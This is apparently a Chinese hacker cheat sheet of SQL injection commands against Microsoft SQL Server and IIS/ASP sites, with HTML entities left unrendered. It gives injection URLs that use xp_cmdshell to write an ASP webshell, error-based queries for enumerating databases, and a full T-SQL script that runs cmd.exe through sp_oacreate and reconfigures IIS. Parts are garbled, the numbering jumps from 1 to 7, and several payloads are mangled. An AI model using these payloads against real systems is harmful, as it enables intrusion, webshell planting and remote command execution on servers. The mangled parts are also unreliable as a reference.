最详细的SQL注入相关的命令

zyp

1、 用^转义字符来写ASP(一句话木马)文件的方法:<br/>? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell &#039;echo ^/script^&gt; &gt;c:&#92;mu.asp&#039;;-- <br/><br/>? echo ^&gt;db_name(n) n改成0,1,2,3……就可以跨库了<br/>? http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--<br/>Microsoft VBScript 编译器错误 错误 &#039;800a03f6&#039; <br/>缺少 &#039;End&#039; <br/>/iisHelp/common/500-100.asp，行242 <br/>Microsoft OLE DB Provider for ODBC Drivers 错误 &#039;80040e07&#039; <br/>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value &#039;huidahouse&#039; to a column of data type int. <br/>/display.asp，行17 <br/>7、 列出当前所有的数据库名称：<br/>select * from master.dbo.sysdatabases 列出所有列的记录<br/>select name from master.dbo.sysdatabases 仅列出name列的记录<br/><br/>8、 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令：<br/>create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)<br/>DECLARE @shell INT<br/>DECLARE @fso INT<br/>DECLARE @file INT<br/>DECLARE @isEnd BIT<br/>DECLARE @out VARCHAR(400)<br/>EXEC sp_oacreate &#039;wscript.shell&#039;,@shell output<br/>EXEC sp_oamethod @shell,&#039;run&#039;,null,&#039;cmd.exe /c dir c:&#92;&gt;c:&#92;temp.txt&#039;,&#039;0&#039;,&#039;true&#039;<br/>--注意run的参数true指的是将等待程序运行的结果，对于类似ping的长时间命令必需使用此参数。<br/><br/>EXEC sp_oacreate &#039;scripting.filesystemobject&#039;,@fso output<br/>EXEC sp_oamethod @fso,&#039;opentextfile&#039;,@file out,&#039;c:&#92;temp.txt&#039;<br/>--因为fso的opentextfile方法将返回一个textstream对象，所以此时@file是一个对象令牌<br/><br/>WHILE @shell&gt;0<br/>BEGIN<br/>EXEC sp_oamethod @file,&#039;Readline&#039;,@out out<br/>insert INTO MYTMP(info) VALUES (@out)<br/>EXEC sp_oagetproperty @file,&#039;AtEndOfStream&#039;,@isEnd out<br/>IF @isEnd=1 BREAK<br/>ELSE CONTINUE<br/>END<br/><br/>drop TABLE MYTMP <br/><br/>----------<br/>DECLARE @shell INT<br/>DECLARE @fso INT<br/>DECLARE @file INT<br/>DECLARE @isEnd BIT<br/>DECLARE @out VARCHAR(400)<br/>EXEC sp_oacreate &#039;wscript.shell&#039;,@shell output<br/>EXEC sp_oamethod @shell,&#039;run&#039;,null,&#039;cmd.exe /c cscript C:&#92;Inetpub&#92;AdminScripts&#92;adsutil.vbs set /W3SVC/InProcessIsapiApps &quot;C:&#92;WINNT&#92;system32&#92;idq.dll&quot; &quot;C:&#92;WINNT&#92;system32&#92;inetsrv&#92;httpext.dll&quot; &quot;C:&#92;WINNT&#92;system32&#92;inetsrv&#92;httpodbc.dll&quot; &quot;C:&#92;WINNT&#92;system32&#92;inetsrv&#92;ssinc.dll&quot; &quot;C:&#92;WINNT&#92;system32&#92;msw3prt.dll&quot; &quot;C:&#92;winnt&#92;system32&#92;inetsrv&#92;asp.dll&quot;&gt;c:&#92;temp.txt&#039;,&#039;0&#039;,&#039;true&#039;<br/>EXEC sp_oacreate &#039;scripting.filesystemobject&#039;,@fso output<br/>EXEC sp_oamethod @fso,&#039;opentextfile&#039;,@file out,&#039;c:&#92;temp.txt&#039;<br/>WHILE @shell&gt;0<br/>BEGIN<br/>EXEC sp_oamethod @file,&#039;Readline&#039;,@out out<br/>insert INTO MYTMP(info) VALUES (@out)<br/>EXEC sp_oagetproperty @file,&#039;AtEndOfStream&#039;,@isEnd out<br/>IF @isEnd=1 BREAK<br/>ELSE CONTINUE<br/>END<br/>